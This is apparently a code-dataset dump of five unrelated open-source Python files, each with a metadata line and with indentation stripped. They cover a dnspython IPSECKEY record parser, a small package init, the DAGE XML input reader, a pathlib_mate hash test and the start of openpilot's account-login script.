| 1.632813 | 2 |
dns/rdtypes/IN/IPSECKEY.py | preo/dnspython | 0 | 5093 | <filename>dns/rdtypes/IN/IPSECKEY.py
# Copyright (C) 2006, 2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import cStringIO
import struct
import dns.exception
import dns.inet
import dns.name
class IPSECKEY(dns.rdata.Rdata):
"""IPSECKEY record
@ivar precedence: the precedence for this key data
@type precedence: int
@ivar gateway_type: the gateway type
@type gateway_type: int
@ivar algorithm: the algorithm to use
@type algorithm: int
@ivar gateway: the public key
@type gateway: None, IPv4 address, IPV6 address, or domain name
@ivar key: the public key
@type key: string
@see: RFC 4025"""
__slots__ = ['precedence', 'gateway_type', 'algorithm', 'gateway', 'key']
def __init__(self, rdclass, rdtype, precedence, gateway_type, algorithm,
gateway, key):
super(IPSECKEY, self).__init__(rdclass, rdtype)
if gateway_type == 0:
if gateway != '.' and not gateway is None:
raise SyntaxError('invalid gateway for gateway type 0')
gateway = None
elif gateway_type == 1:
# check that it's OK
junk = dns.inet.inet_pton(dns.inet.AF_INET, gateway)
elif gateway_type == 2:
# check that it's OK
junk = dns.inet.inet_pton(dns.inet.AF_INET6, gateway)
elif gateway_type == 3:
pass
else:
raise SyntaxError('invalid IPSECKEY gateway type: %d' % gateway_type)
self.precedence = precedence
self.gateway_type = gateway_type
self.algorithm = algorithm
self.gateway = gateway
self.key = key
def to_text(self, origin=None, relativize=True, **kw):
if self.gateway_type == 0:
gateway = '.'
elif self.gateway_type == 1:
gateway = self.gateway
elif self.gateway_type == 2:
gateway = self.gateway
elif self.gateway_type == 3:
gateway = str(self.gateway.choose_relativity(origin, relativize))
else:
raise ValueError('invalid gateway type')
return '%d %d %d %s %s' % (self.precedence, self.gateway_type,
self.algorithm, gateway,
dns.rdata._base64ify(self.key))
def from_text(cls, rdclass, rdtype, tok, origin = None, relativize = True):
precedence = tok.get_uint8()
gateway_type = tok.get_uint8()
algorithm = tok.get_uint8()
if gateway_type == 3:
gateway = tok.get_name().choose_relativity(origin, relativize)
else:
gateway = tok.get_string()
chunks = []
while 1:
t = tok.get().unescape()
if t.is_eol_or_eof():
break
if not t.is_identifier():
raise dns.exception.SyntaxError
chunks.append(t.value)
b64 = ''.join(chunks)
key = b64.decode('base64_codec')
return cls(rdclass, rdtype, precedence, gateway_type, algorithm,
gateway, key)
from_text = classmethod(from_text)
def to_wire(self, file, compress = None, origin = None):
header = struct.pack("!BBB", self.precedence, self.gateway_type,
self.algorithm)
file.write(header)
if self.gateway_type == 0:
pass
elif self.gateway_type == 1:
file.write(dns.inet.inet_pton(dns.inet.AF_INET, self.gateway))
elif self.gateway_type == 2:
file.write(dns.inet.inet_pton(dns.inet.AF_INET6, self.gateway))
elif self.gateway_type == 3:
self.gateway.to_wire(file, None, origin)
else:
raise ValueError('invalid gateway type')
file.write(self.key)
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin = None):
if rdlen < 3:
raise dns.exception.FormError
header = struct.unpack('!BBB', wire[current : current + 3])
gateway_type = header[1]
current += 3
rdlen -= 3
if gateway_type == 0:
gateway = None
elif gateway_type == 1:
gateway = dns.inet.inet_ntop(dns.inet.AF_INET,
wire[current : current + 4])
current += 4
rdlen -= 4
elif gateway_type == 2:
gateway = dns.inet.inet_ntop(dns.inet.AF_INET6,
wire[current : current + 16])
current += 16
rdlen -= 16
elif gateway_type == 3:
(gateway, cused) = dns.name.from_wire(wire[: current + rdlen],
current)
current += cused
rdlen -= cused
else:
raise dns.exception.FormError('invalid IPSECKEY gateway type')
key = wire[current : current + rdlen].unwrap()
return cls(rdclass, rdtype, header[0], gateway_type, header[2],
gateway, key)
from_wire = classmethod(from_wire)
| 2.140625 | 2 |
multistream_select/__init__.py | Projjol/py-multistream-select | 0 | 5094 | __version = '0.1.0'
__all__ = ['MultiStreamSelect', 'hexify']
__author__ = '<NAME> (<EMAIL>)'
__name__ = 'multistream'
from .multistream import MultiStreamSelect
from .utils import hexify
| 1.21875 | 1 |
python/input_reader.py | dagesundholm/DAGE | 3 | 5095 | <gh_stars>1-10
"""---------------------------------------------------------------------------------*
* Copyright (c) 2010-2018 <NAME>, <NAME>, <NAME>, *
* <NAME>, <NAME>, <NAME> *
* *
* Permission is hereby granted, free of charge, to any person obtaining a copy *
* of this software and associated documentation files (the "Software"), to deal *
* in the Software without restriction, including without limitation the rights *
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell *
* copies of the Software, and to permit persons to whom the Software is *
* furnished to do so, subject to the following conditions: *
* *
* The above copyright notice and this permission notice shall be included in all*
* copies or substantial portions of the Software. *
* *
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR *
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, *
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE *
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER *
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, *
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE *
* SOFTWARE. *
*----------------------------------------------------------------------------------"""
# Input file reader
import os
import sys
import xml.etree.ElementTree as ET
import numpy, ast
from .generate_objects import SettingsGenerator
from collections import OrderedDict
class InputProgrammingError(Exception):
pass
class InputXML(object):
tag_type = 'input'
definition_tag = 'input_definition'
def __init__(self, filename = None, \
definition_filename = None,\
input_object = None,\
parent_object = None,\
definition = None, \
directory = None):
if (input_object is not None):
self.root = input_object
elif filename is not None:
if definition_filename is None:
definition_filename = os.path.dirname(os.path.realpath(__file__))+"/input_parameters.xml"
if os.path.exists(filename):
self.tree = ET.parse(filename)
self.root = self.tree.getroot()
else:
print("Path for definition file: '{}' does not exist".format(filename))
else:
self.root = None
self.parent_object = parent_object
if directory is not None:
self.directory = directory
elif filename is not None and os.path.exists(filename):
self.directory = os.path.dirname(filename)
elif self.parent_object is not None:
self.directory = self.parent_object.directory
else:
self.directory = None
if definition is not None:
self.definition = definition
elif definition_filename is not None:
if os.path.exists(definition_filename):
definition = ET.parse(definition_filename)
self.definition = definition.getroot()
else:
sys.exit("Input definition filename does not exist: {}".format(definition_filename))
elif self.parent_object is not None:
definition = self.parent_object.definition.find(self.definition_tag)
if definition is not None:
self.definition = definition
else:
sys.exit("Definition tag '{}' not found from parent definition tree", self.definition_tag)
else:
sys.exit("Definition tag input not given.")
self.retrieve()
def prepare(self):
"""
Prepare the input to have all things required to
call the Fortran interface
"""
self.parse()
self.handle_folders()
self.fill_id_values()
kwargs = OrderedDict()
self.get_interface_argument_values(kwargs)
return kwargs
def form_new_directory_path(self, path_text, original_directory = None):
"""
Creates a new directory path from 'path_text' and 'original_directory' and
validate that it exists. Returns the new path.
"""
if original_directory is not None:
complete_path = os.path.join(original_directory, path_text)
else:
complete_path = path_text
directory_path = os.path.dirname(complete_path)
# check if the path exists
if not os.path.exists(directory_path):
raise Exception("Error: '{}' tag path '{}' does not exist".format(self.tag_type, complete_path))
return directory_path
def retrieve_path(self, path_text, directory):
"""
Retrieves content of xml file at path 'path_text'
to and store it to 'parameter_name' atribute of 'self'.
"""
if directory is not None:
complete_path = os.path.join(directory, path_text)
else:
complete_path = path_text
# check if the path exists
if os.path.exists(complete_path):
tree = ET.parse(complete_path)
return tree.getroot()
else:
raise Exception("Error: '{}' tag path '{}' does not exist".format(self.tag_type, complete_path))
def retrieve(self):
"""
Retrieves content to the tag from external file(s),
if the tag has attribute or child named 'path' and/or
'extends_path'.
"""
if self.root is not None:
# check if current tag has an attribute or child with
# name 'path'
path_text = InputXML.read_tag_or_attribute_value(self.root, 'path')
# try to retrieve the content from path_text
if path_text is not None and path_text != "":
try:
self.root = self.retrieve_path(path_text, self.directory)
self.directory = self.form_new_directory_path(path_text, self.directory)
except Exception as e:
sys.exit(str(e))
# check if current tag has an attribute or child with
# name 'extends_path'
path_text = InputXML.read_tag_or_attribute_value(self.root, 'extends_path')
self.extends_roots = []
self.extends_directories = []
directory = self.directory
while path_text is not None:
# try to retrieve the content from path_text
try:
self.extends_roots.append(self.retrieve_path(path_text, directory))
self.extends_directories.append(self.form_new_directory_path(path_text, directory))
except Exception as e:
sys.exit(str(e))
# prepare for the next loop by getting the next extends path and corresponding directory
directory = self.extends_directories[-1]
path_text = InputXML.read_tag_or_attribute_value(self.extends_roots[-1], 'extends_path')
def fill_id_values(self):
"""
Finds the id for each parameter where reference is made with name
and fills it to the correct place
"""
for parameter_name in self.parameter_values:
if parameter_name.endswith("_id"):
# check if the tag has value that is not 0, in that case
# we are not finding the value
if self.get_parameter_value(parameter_name) == 0:
tagtype = parameter_name[:parameter_name.rfind('_')]
name_tag_found = tagtype+"_name" in self.parameter_values
if name_tag_found:
name = self.parameter_values[tagtype+"_name"]
if name is not None and name != "":
id_value = self.get_tagid_for_name(tagtype, name)
if id_value != -1:
self.parameter_values[parameter_name] = id_value
for child in self.children:
child.fill_id_values()
def get_tagid_for_name(self, tagtype, name):
if self.parent_object is not None:
for child in self.parent_object.children:
if hasattr(child, 'tag_type') and child.tag_type == tagtype and hasattr(child, 'name') and child.name == name:
return child.id
return -1
def get_parameter_definition(self, parameter_name):
"""
Retrieve the parameter definition for parameter name
'parameter_name'.
"""
for parameter_definition in self.definition.findall('parameter'):
if parameter_definition.attrib['name'] == parameter_name:
return parameter_definition
return None
def get_definition_tag(self, tag_name):
"""
Retrieve the definition tag for a tag with name = tag_name
"""
definition = self.definition.find('{}'.format(tag_name))
return definition
def _parse_children(self, root, directory):
"""
Parse children of root xml-tag 'root' and store them as
children in the 'self'.
Note: this function is a subfunctionality of function 'parse'
and it should not be used independently.
"""
for tag in root:
if tag.tag not in self.parameter_values:
# try to find the correct definition tag by using the "*_input"-format
definition = self.definition.find('{}_input'.format(tag.tag))
# if the input definition was not found, try to find the definition from
# the '<class>'-tags
if definition is None:
definition_found = False
for definition_tag in self.definition.findall('class'):
if definition_tag.attrib['name'] == tag.tag:
definition = definition_tag
definition_found = True
break
if not definition_found:
print("Warning: Found unknown tag with name '{}'. Ignoring.".format(tag.tag))
continue
else:
child = InputXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
else:
if tag.tag == 'settings':
child = SettingsXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'structure':
child = StructureXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'basis_set':
child = BasisSetXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'action':
child = ActionXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'scf_energetics':
child = SCFEnergeticsXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
self.children.append(child)
self.child_definitions.append(tag.tag)
self.add_counters(child)
child.parse()
def parse(self):
"""
Parse paremeters and child xml-tags of the root-xml tags stored
in self.root and self.extends_roots. Stores the found child-xml classes
to 'self.children' and the parameter values to 'self.parameter_values'.
The corresponding definitions are stored to 'self.child_definitions' and
'self.parameter_definitions', respectively.
User must note that this function is recursive as it calls 'parse' for
all found children in '_parse_children' calls.
"""
self.parameter_values = OrderedDict()
self.parameter_definitions = OrderedDict()
self.children = []
self.child_definitions = []
# handle the parameters first
for parameter_definition in self.definition.findall('parameter'):
if SettingsGenerator.is_valid_parameter(parameter_definition):
self.set_parameter_value(parameter_definition, self.read_parameter_value(parameter_definition))
self.parameter_definitions[parameter_definition.attrib['name']] = parameter_definition
if parameter_definition.attrib['name'] == 'name':
self.name = self.parameter_values['name']
else:
print("PARAMETER is not valid", parameter_definition.attrib['name'])
# if the object has extends_root, then parse the children from it
# and store them to 'self'
if hasattr(self, 'extends_roots') and self.extends_roots is not None\
and hasattr(self, 'extends_directories') and self.extends_directories is not None:
for i, extends_root in enumerate(self.extends_roots):
self._parse_children(extends_root, self.extends_directories[i])
# parse the children from the xml-root of this object and store them
# to 'self'
if self.root is not None:
self._parse_children(self.root, self.directory)
# add the tag classes that are not found in the input file, just to
# input the default values.
for definition_tag in self.definition.findall('class'):
if definition_tag.attrib['name'] not in self.child_definitions:
child = InputXML(parent_object = self, definition = definition_tag)
self.children.append(child)
child.parse()
def handle_folders(self):
"""
Creates missing folders and replaces relative paths with
non-relative ones
"""
for parameter_name in self.parameter_values:
if parameter_name in ['output_folder', 'input_folder', 'folder_path']:
if self.parameter_values[parameter_name] is not None:
# convert the non absolute paths to absolute ones
if not os.path.isabs(self.parameter_values[parameter_name]):
# join the directory of the file with the input directory
path = os.path.join(self.directory, self.parameter_values[parameter_name])
# make the path more readable by removing extra slashes and dots
self.parameter_values[parameter_name] = os.path.normpath(path)
# if the output folder does not exist, create it
if parameter_name == 'output_folder' and not os.path.exists(self.parameter_values[parameter_name]):
os.makedirs(self.parameter_values[parameter_name])
for child in self.children:
child.handle_folders()
def get_interface_argument_values(self, argument_values, parameter_definitions = {}, abbreviation = None, counter_present = False):
"""
This function converts the values of the parameters to a form suitable for the
Fortran interface. The converted values are stored to input-output dictionary 'arguments_values'.
"""
if 'abbreviation' in self.definition.attrib:
abbreviation = self.definition.attrib['abbreviation']
for parameter_name in self.parameter_values:
if SettingsGenerator.generate_fortran(self.parameter_definitions[parameter_name]):
if abbreviation is not None:
argument_key = "{}_{}".format(abbreviation, parameter_name)
else:
argument_key = parameter_name
if counter_present:
# Check if the parameter value is None. If the value is None, the
# parameter is not present in the input file, and the default
# value of the parameter is not specified.
if self.parameter_values[parameter_name] is not None:
if argument_key in argument_values and argument_values[argument_key] is not None:
argument_values[argument_key].append(self.parameter_values[parameter_name])
else:
argument_values[argument_key] = [self.parameter_values[parameter_name]]
parameter_definitions[argument_key] = self.parameter_definitions[parameter_name]
else:
if argument_key not in parameter_definitions:
argument_values[argument_key] = None
parameter_definitions[argument_key] = self.parameter_definitions[parameter_name]
else:
if argument_key in argument_values:
print("Warning: Found two (or more) arguments for the same parameter: {}".format(argument_key))
else:
argument_values[argument_key] = self.parameter_values[parameter_name]
parameter_definitions[argument_key] = self.parameter_definitions[parameter_name]
for child in self.children:
if 'global_index_counter' in child.definition.attrib or 'local_index_counter' in child.definition.attrib or 'counters' in child.definition.attrib:
counter_present = True
if SettingsGenerator.generate_fortran(child.definition):
child.get_interface_argument_values(argument_values, parameter_definitions, abbreviation = abbreviation, counter_present = counter_present)
# if we are at the root, convert the values with type list to numpy arrays
if self.parent_object is None:
for argument_key in list(argument_values):
# the string lists need some special attention:
if parameter_definitions[argument_key].attrib['type'].startswith('string') and type(argument_values[argument_key]) == list:
temp = numpy.empty((256, len(argument_values[argument_key])+1), dtype="c")
for j, value in enumerate(argument_values[argument_key]):
temp[:, j] = "{0:{width}}".format(argument_values[argument_key][j], width=256)
argument_values[argument_key] = numpy.array(temp, dtype="c").T
elif type(argument_values[argument_key]) == list:
temp_array = numpy.array(argument_values[argument_key], order='F').T
shape = temp_array.shape
if len(shape) == 3:
new_shape = (shape[0], shape[1], shape[2]+1)
elif len(shape) == 2:
new_shape = (shape[0], shape[1]+1)
else:
new_shape = (shape[0]+1)
new_array = numpy.empty(new_shape, order='F')
if len(shape) == 3:
new_array[:, :, :shape[2]] = temp_array[:, :, :]
elif len(shape) == 2:
new_array[:, :shape[1]] = temp_array[:, :]
else:
new_array[:shape[0]] = temp_array[:]
argument_values[argument_key] = new_array
elif argument_values[argument_key] is None:
del argument_values[argument_key]
def add_counters(self, child):
"""
Add all the counter values for the child object 'child' of 'self' by one
"""
if 'global_index_counter' in child.definition.attrib:
success = self.add_counter_value(child.definition.attrib['global_index_counter'])
if not success:
print("Warning: Adding counter {} failed. Counter not found.".format(child.definition.attrib['global_index_counter']))
else:
child.id = self.get_counter_value(child.definition.attrib['global_index_counter'])
if 'local_index_counter' in child.definition.attrib:
success = self.add_counter_value(child.definition.attrib['local_index_counter'])
if not success:
print("Warning: Adding counter {} failed. Counter not found.".format(child.definition.attrib['local_index_counter']))
if 'counters' in child.definition.attrib:
success = self.add_counter_value(child.definition.attrib['counters'])
if not success:
print("Warning: Adding counter {} failed. Counter not found.".format(child.definition.attrib['counters']))
def add_counter_value(self, counter_name):
"""
Add value of counter parameter with name=='counter_name' by one.
If the counter is not found in the local object, it
is seached from the parent objects.
"""
if counter_name in self.parameter_values:
if self.parameter_values[counter_name] is None:
self.parameter_values[counter_name] = 0
self.parameter_values[counter_name] += 1
return True
else:
if self.parent_object is not None:
return self.parent_object.add_counter_value(counter_name)
else:
return False
def get_counter_value(self, counter_name):
"""
Get the value of a counter with name 'counter_name'.
If the counter is not found in the local object, it
is seached from the parent objects.
"""
if counter_name in self.parameter_values:
return self.parameter_values[counter_name]
else:
if self.parent_object is not None:
return self.parent_object.get_counter_value(counter_name)
else:
return -1
def set_parameter_value(self, parameter_definition, value):
"""
Set an arbitrary value 'value' for the parameter with definition
'parameter_definition'.
"""
# convert the value to right data type and check that it is valid
final_value = self.convert_argument_value(value, parameter_definition)
# check that value is within given limits
self.check_value_range(final_value, parameter_definition)
# set the parameter value
self.parameter_values[parameter_definition.attrib['name']] = final_value
@staticmethod
def read_tag_or_attribute_value(root, name):
"""
Reads the value of a tag or attribute with name 'name' in an xml. If
attribute or tag is not found, None is returned.
"""
value = None
if root is not None:
tag = root.find(name)
if tag is not None:
value = tag.text
elif name in root.attrib:
value = root.attrib[name]
return value
def read_parameter_value(self, parameter_definition):
"""
Read the value of the parameter first from the values of the XML-element,
secondarily from the objects we are extending from and thirdly from
the default value of the parameter definition.
"""
value = InputXML.read_tag_or_attribute_value(self.root, parameter_definition.attrib['name'])
# if value is not found at root, then use the value from extends roots
if value is None and hasattr(self, 'extends_roots') and self.extends_roots is not None:
for extends_root in self.extends_roots:
value = InputXML.read_tag_or_attribute_value(extends_root, parameter_definition.attrib['name'])
# if value is found, break the iteration
if value is not None:
break
# fall back to default value/or None if one is not specified
if value is None:
if 'default' in parameter_definition.attrib:
value = parameter_definition.attrib['default']
return value
def get_parameter_value(self, parameter_name):
"""
Get the value of the parameter from the parsed parameters.
If the parameter is not found an InputProgrammingError
is raised.
"""
if hasattr(self, 'parameter_values') and parameter_name in self.parameter_values:
return self.parameter_values[parameter_name]
else:
raise InputProgrammingError("Accessed parameter: '{}' is not in the values ".format(parameter_name)+ \
"of the object. Have you perfomed 'parse' for the object?")
def parameter_values_are_equal(self, other, parameter_name):
"""
Compare the values of parameter with name 'parameter_name' for
two objects of the same type.
"""
# check that the input objects are of same type
if type(self) != type(other):
raise InputProgrammingError("The objects compared with parameter_values_are_equal"+
" are not of same type.")
# get the values for both input objects
self_value = self.get_parameter_value(parameter_name)
other_value = other.get_parameter_value(parameter_name)
if isinstance(self_value, list) or isinstance(self_value, numpy.ndarray):
if len(self_value) != len(other_value):
return False
for i in range(len(self_value)):
if type(self_value[i]) == float or type(self_value[i]) == numpy.float64 or type(self_value[i]) == numpy.float32 or type(self_value[i]) == numpy.float16:
if abs(self_value[i] - other_value[i]) > 1e-10:
return False
elif self_value[i] != other_value[i]:
return False
return True
else:
return self_value == other_value
def all_parameter_values_are_equal(self, other):
"""
Check if all parameter values of 'self' and 'other'
are equal
"""
for parameter_name in self.parameter_values:
if not self.parameter_values_are_equal(other, parameter_name):
return False
return True
def is_of_same_type_as(self, other):
"""
Check if self is of same type as other
"""
return type(self) == type(other) \
and self.definition.attrib['name'] == other.definition.attrib['name']
def children_are_equal(self, other):
"""
Check if children of 'self' and 'other' are equal with definition
and value
"""
for child in self.children:
equal_found = False
# go through all the children and check if there is equal
for other_child in other.children:
if child == other_child:
equal_found = True
# if not, the children cannot be equal
if not equal_found:
return False
return True
def __eq__(self, other):
"""
Check if two InputXML objects are equal with each other
"""
return self.is_of_same_type_as(other)\
and self.all_parameter_values_are_equal(other)\
and self.children_are_equal(other)
def __ne__(self, other):
return not self.__eq__(other)
def read_array_values(self, value_text, argument_type):
is_number = argument_type.startswith("int") or \
argument_type.startswith("float") or \
argument_type.startswith("double")
# try to evaluate the molecular orbitals as dict
try:
dictionary = ast.literal_eval("{"+ value_text +"}")
size = max(dictionary.keys())
# init array of size
if is_number:
result = [0] * size
else:
result = [None] * size
for key in dictionary:
# convert the indexing from the 1-starting to 0-starting
result[key-1] = dictionary[key]
except:
try:
result = ast.literal_eval("["+ value_text +"]")
except:
raise Exception("Bad form of array, should have a list or a dictionary, value is: {}.".format(value_text))
return result
def convert_argument_value(self, value_text, parameter_definition):
argument_type = parameter_definition.attrib['type']
if SettingsGenerator.has_options(parameter_definition):
value_text = self.get_option_value(value_text, parameter_definition)
if SettingsGenerator.is_array(parameter_definition):
if value_text is None:
value = None
else:
# do the parsing of the input array (could also be a dictionary), which
# has to be changed to a list
array_values = self.read_array_values(value_text, argument_type)
# get the final size of the result array from the parameter definition
size = int(parameter_definition.attrib['shape'])
value = numpy.zeros(size)
try:
for i, arg in enumerate(array_values):
if argument_type.startswith('int'):
value[i] = int(arg)
if argument_type.startswith('float'):
value[i] = float(arg)
if argument_type.startswith('double'):
value[i] = float(arg)
if argument_type.startswith('string'):
if SettingsGenerator.generate_fortran(parameter_definition):
value[i] = str(arg)
else:
value[i] = str(arg)
if argument_type.startswith('bool'):
if arg.lower() == 'false':
value[i] = False
elif arg.lower() == 'true':
value[i] = True
else:
value[i] = bool(arg)
except ValueError:
sys.exit('Error: parameter with type \'{}\' and name \'{}\' has invalid value: \'{}\''.format(argument_type, parameter_definition.attrib['name'], value_text))
else:
try:
if value_text is None:
value = None
elif argument_type.startswith('int'):
value = int(value_text)
elif argument_type.startswith('float'):
value = float(value_text)
elif argument_type.startswith('double'):
value = float(value_text)
elif argument_type.startswith('string'):
if SettingsGenerator.generate_fortran(parameter_definition):
value = str(value_text)
else:
value = str(value_text)
elif argument_type.startswith('bool'):
if value_text.lower() == 'false':
value = False
elif value_text.lower() == 'true':
value = True
else:
value = bool(arg)
except ValueError:
sys.exit('Error: parameter with type \'{}\' and name \'{}\' has invalid value: \'{}\''.format(argument_type, parameter_definition.attrib['name'], value_text))
return value
def check_value_range(self, value, parameter_definition):
if value is not None:
if 'minval' in parameter_definition.attrib:
minval = parameter_definition.attrib['minval']
if value < float(minval):
sys.exit('Error: argument with name {} and value {} is smaller than the smallest allowed value: {}', parameter_definition.attrib['name'], value, float(minval))
if 'maxval' in parameter_definition.attrib:
maxval = parameter_definition.attrib['maxval']
if value > float(maxval):
sys.exit('Error: argument with name {} and value {} is larger than the largest allowed value: {}', parameter_definition.attrib['name'], value, float(maxval))
def get_option_value(self, value_text, parameter_definition):
options = parameter_definition.findall('option')
result = None
if len(options) > 0:
valid_options = ""
for option in options:
if 'value' in option.attrib and value_text == option.attrib['value']:
return value_text
elif 'text_value' in option.attrib and value_text == option.attrib['text_value']:
return option.attrib['value']
else:
valid_options += ("{}: {} ".format(option.attrib['value'], option.attrib['text_value']))
sys.exit('Error: The value "{}" for argument with name "{}" is not within allowed options: {} '.format(value_text, parameter_definition.attrib['name'], valid_options))
def get_root_object(self):
if self.parent_object is None:
return self
else:
return self.parent_object.get_root_object()
class SCFEnergeticsXML(InputXML):
tag_type = 'scf_energetics'
definition_tag = 'scf_energetics_input'
class ActionXML(InputXML):
tag_type = 'action'
definition_tag = 'action_input'
def parse(self):
super(ActionXML, self).parse()
self.handle_output_files()
def handle_output_files(self):
"""
Reads in the output files and creates the corresponding
objects to the tree
"""
if 'output_folder' in self.parameter_values:
scf_energetics_filename = \
os.path.join(self.parameter_values['output_folder'], "scf_energetics.xml")
root_object = self.get_root_object()
# if scf energetics file exists, parse it and add as a child of the root
# and set it as the input scf energetics of the action
if os.path.exists(os.path.join(self.directory, scf_energetics_filename)):
scf_energetics_definition = root_object.definition.find('scf_energetics_input')
scf_energetics = SCFEnergeticsXML(parent_object = root_object, \
definition = scf_energetics_definition)
scf_energetics.root = scf_energetics.retrieve_path(scf_energetics_filename, scf_energetics.directory)
root_object.children.append(scf_energetics)
root_object.child_definitions.append('scf_energetics')
root_object.add_counters(scf_energetics)
scf_energetics.parse()
scf_energetics_id_definition = self.get_parameter_definition('scf_energetics_id')
self.set_parameter_value(scf_energetics_id_definition, scf_energetics.id)
structure_filename = \
os.path.join(self.parameter_values['output_folder'], "structure.xml")
# if structure file exists, parse it and add it as a child of the root
# and set it as the input structure of the action
if os.path.exists(os.path.join(self.directory, structure_filename)):
structure_definition = root_object.definition.find('structure_input')
structure = StructureXML(parent_object = root_object, \
definition = structure_definition)
structure.root = structure.retrieve_path(structure_filename, structure.directory)
root_object.children.append(structure)
root_object.child_definitions.append('structure')
root_object.add_counters(structure)
structure.parse()
structure_id_definition = self.get_parameter_definition('structure_id')
self.set_parameter_value(structure_id_definition, structure.id)
class BasisSetXML(InputXML):
tag_type = 'basis_set'
definition_tag = 'basis_set_input'
class SettingsXML(InputXML):
tag_type = 'settings'
definition_tag = 'settings_input'
class StructureXML(InputXML):
tag_type = 'structure'
definition_tag = 'structure_input'
atom_types = {'H':1, 'He':2, 'Li':3, 'Be':4, 'B':5, 'C':6, 'N':7, 'O':8, 'F':9, 'Ne':10, 'Na': 11, 'Mg':12, 'Al':13, 'Si':14, 'P':15, 'S':16, 'Cl':17, 'Ar':18}
def read_input(self):
charge = self.root.find('charge')
# read relative charge
if (charge is not None):
self.charge = int(charge.text)
else:
self.charge = 0
# read coordinates and atom types
self.coordinates = []
self.types = []
self.charges = []
# first read atom coordinates in 'atom' tags
for i, atom in enumerate(self.root.findall('atom')):
self.read_atom_coordinates_and_type(atom)
# then read atoms in 'atoms' tags
for i, atoms in enumerate(self.root.findall('atoms')):
self.read_atoms_coordinates_and_types(atoms)
def read_atom_coordinates_and_type(self, atom):
result = [0.0, 0.0, 0.0]
x = atom.find('x')
if (x is not None):
result[0] = float(x.text)
y = atom.find('y')
if (y is not None):
result[1] = float(y.text)
z = atom.find('z')
if (z is not None):
result[2] = float(z.text)
xyz = atom.find('xyz')
atom_type = self.read_atom_type(atom)
if (xyz is not None):
xyz_text = xyz.text.strip().split(" ")
if (len(xyz_text) == 4):
atom_type = get_atom_type(xyz_text[0])
atom_charge = get_atom_charge(xyz_text[0])
result[0] = float(xyz_text[1])
result[1] = float(xyz_text[2])
result[2] = float(xyz_text[3])
else:
sys.exit("Error: Too many or too few coordinates in 'atom'->'xyz' -tag.")
self.coordinates.append(result)
self.types.append(atom_type)
self.charges.append(atom_charge)
def get_atom_type(self, atom_type_text):
return int(self.atom_types[atom_type_text])
def get_atom_charge(self, atom_type_text):
return float(self.atom_types[atom_type_text])
def read_atom_type(self, atom):
if 'type' in atom.attrib:
return atom.attrib['type']
else:
sys.exit("Error: The mandatory attribute 'type' not found in 'atom'-tag")
def read_atoms_coordinates_and_types(self, atoms):
xyz = atoms.find('xyz')
coordinates = []
types = []
charges = []
if (xyz is not None):
xyz_lines = xyz.text.splitlines()
for xyz in xyz_lines:
xyz_text = xyz.strip().split(" ")
xyz_coord = [0.0, 0.0, 0.0]
# ignore empty lines
if (len(xyz_text) == 1 and xyz_text[0] == ""):
continue
elif (len(xyz_text) == 4):
types.append(self.get_atom_type(xyz_text[0]))
charges.append(self.get_atom_charge(xyz_text[0]))
xyz_coord[0] = float(xyz_text[1])
xyz_coord[1] = float(xyz_text[2])
xyz_coord[2] = float(xyz_text[3])
coordinates.append(xyz_coord)
else:
sys.exit("Error: Too many or too few coordinates in 'atoms'->'xyz' -line.")
self.coordinates.extend(coordinates)
self.types.extend(types)
self.charges.extend(charges)
if __name__ == "__main__":
if len(sys.argv) <= 1:
print("Give the input file name as an input.")
else:
inp = InputXML(filename = sys.argv[1], definition_filename = os.path.dirname(os.path.realpath(__file__))+"/input_parameters.xml")
import dage_fortran
dage_fortran.python_interface.run(**inp.prepare())
| 1.375 | 1 |
tests/test_mate_hashes_methods.py | MacHu-GWU/pathlib_mate-project | 9 | 5096 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import pytest
from pathlib_mate.pathlib2 import Path
class TestHashesMethods(object):
def test(self):
p = Path(__file__)
assert len({
p.md5, p.get_partial_md5(nbytes=1 << 20),
p.sha256, p.get_partial_sha256(nbytes=1 << 20),
p.sha512, p.get_partial_sha512(nbytes=1 << 20),
}) == 3
if __name__ == "__main__":
import os
basename = os.path.basename(__file__)
pytest.main([basename, "-s", "--tb=native"])
| 2.328125 | 2 |
tools/lib/auth.py | shoes22/openpilot | 121 | 5097 | #!/usr/bin/env python3
"""
Usage::
usage: auth.py [-h] [{google,apple,github,jwt}] [jwt]
Login to your comma account
positional arguments:
{google,apple,github,jwt}
jwt
optional arguments:
-h, --help show this help message and exit
Examples::
./auth.py # Log in with google account
./auth.py github # Log in with GitHub Account
./auth.py jwt ey......hw # Log in with a JWT from https://jwt.comma.ai, for use in CI
"""
import argparse
import sys
import pprint
import webbrowser
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Any, Dict
from urllib.parse import parse_qs, urlencode
